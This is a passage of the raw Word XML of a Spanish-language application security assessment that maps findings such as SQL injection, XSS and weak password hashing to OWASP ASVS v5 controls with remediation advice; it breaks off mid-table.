    <w:p w14:paraId="528CA7CC" w14:textId="711A087A"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6C43E227" w14:textId="3844D7AD"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13A9DC53" w14:textId="57C4DCCE"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5E7AF77A" w14:textId="2704A41C"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5CB9C469" w14:textId="2AF57974"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43A39F3C" w14:textId="1CA300F8"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3CF6E0AC" w14:textId="28E9A549"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66DC11E3" w14:textId="64D6CD04"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40557023" w14:textId="5F230BB5"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594CDA25" w14:textId="191A0912"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1BD9AD1E" w14:textId="099668E4"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0F27C1C6" w14:textId="7C42FDB0" w:rsidR="2EEBD3E9" w:rsidRDefault="2EEBD3E9" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Aplicación de ASVS v5 al proyecto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F154D7" w14:textId="71B5B43F" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339A2093" w14:textId="06DE2713" w:rsidR="2EEBD3E9" w:rsidRDefault="2EEBD3E9" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Para efectos de esta evaluación, los controles y aspectos de seguridad relacionados con el desarrollo de la aplicación serán clasificados según las categorías e indicadores de OWASP ASVS v5 aplicables al alcance del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F3F181" w14:textId="4F662E27" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C0BB0AF" w14:textId="030C0627" w:rsidR="2EEBD3E9" w:rsidRDefault="2EEBD3E9" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>La clasificación permitirá determinar qué requisitos de seguridad deben ser considerados en función de las características y componentes evaluados, facilitando la identificación de brechas, la priorización de acciones de mejora y la definición de recomendaciones orientadas al desarrollo seguro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B2A99A" w14:textId="2F36071D" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D398E0F" w14:textId="094674D3" w:rsidR="2EEBD3E9" w:rsidRDefault="2EEBD3E9" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Como parte del informe, cada aspecto evaluado podrá asociarse con su correspondiente categoría ASVS, requisito o indicador, descripción del control, evidencia obtenida, resultado de la verificación y recomendación de remediación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774B176" w14:textId="5461C25C" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE931DB" w14:textId="6E7F1B36" w:rsidR="2EEBD3E9" w:rsidRDefault="2EEBD3E9" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Clasificación ASVS v5 del proyecto:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE41403" w14:textId="59549CB3" w:rsidR="2EEBD3E9" w:rsidRDefault="2EEBD3E9" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>La siguiente matriz resume la clasificación de los 22 hallazgos identificados frente a los requisitos aplicables de OWASP ASVS v5, indicando el resultado de la verificación y la recomendación de remediación asociada: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73"/>
        <w:gridCol w:w="1389"/>
        <w:gridCol w:w="2130"/>
        <w:gridCol w:w="922"/>
        <w:gridCol w:w="1047"/>
        <w:gridCol w:w="2167"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F6929" w14:paraId="08B14A07" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="6035A76E" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Categoría ASVS v5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="05650E4A" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Requisito / Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="10E1F2DE" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Descripción del control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="472EFB26" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Resultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="7065CC19" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hallazgo relacionado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="0C53DF7C" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recomendación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="229036F0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1471A7F1" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V1 – Codificación y Sanitización</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67448145" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Prevención de inyección SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A202129" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Toda consulta a base de datos debe construirse mediante sentencias preparadas/parametrizadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DA50DB7" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="500C0DEE" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-1 a VUL-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="797F453D" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Migrar el 100% de las consultas a mysqli/PDO con prepared statements y bind_param</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="6C08504A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11985FBF" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V1 – Codificación y Sanitización</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D9DCB9A" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Codificación de salida (Output Encoding)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="499882AD" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Todo dato reflejado en HTML debe codificarse para prevenir XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AD9F55F" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16A72524" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254891A6" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Aplicar </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>htmlspecialchars(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>$dato, ENT_QUOTES, 'UTF-8') en toda salida dinámica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="28AE4BCD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15FD0F8F" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V2 – Validación y Lógica de Negocio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="284AB159" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Validación de tipo de datos de entrada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54827959" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Todo parámetro de entrada debe validarse en tipo/formato antes de su uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C763941" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E7F37FF" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0194131F" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Forzar tipado (intval, filter_var) y listas blancas de valores permitidos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="34432DFC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="419ED283" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>V2 – Validación y Lógica de Negocio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04FEC52C" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Validación de reglas de negocio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CDECF0C" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Las operaciones deben validar que los recursos referenciados estén disponibles/vigentes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB9E3B0" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5860B918" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11A9A59D" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Aplicar los mismos filtros de visibilidad/eliminación usados en el menú </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>también al agregar ítems al carrito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F6929" w14:paraId="4765769D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1047EDFF" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>V6 – Autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3282141F" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Almacenamiento seguro de credenciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434AC3DA" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Las contraseñas deben almacenarse mediante una función de hash adaptativa (bcrypt / Argon2 / PBKDF2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26484CD3" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NO CUMPLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EB81132" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>VUL-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36787D23" w14:textId="77777777" w:rsidR="004F6929" w:rsidRDefault="007E7A0C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Migrar a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>hash(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">) / </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>verify(</w:t>
            </w:r>
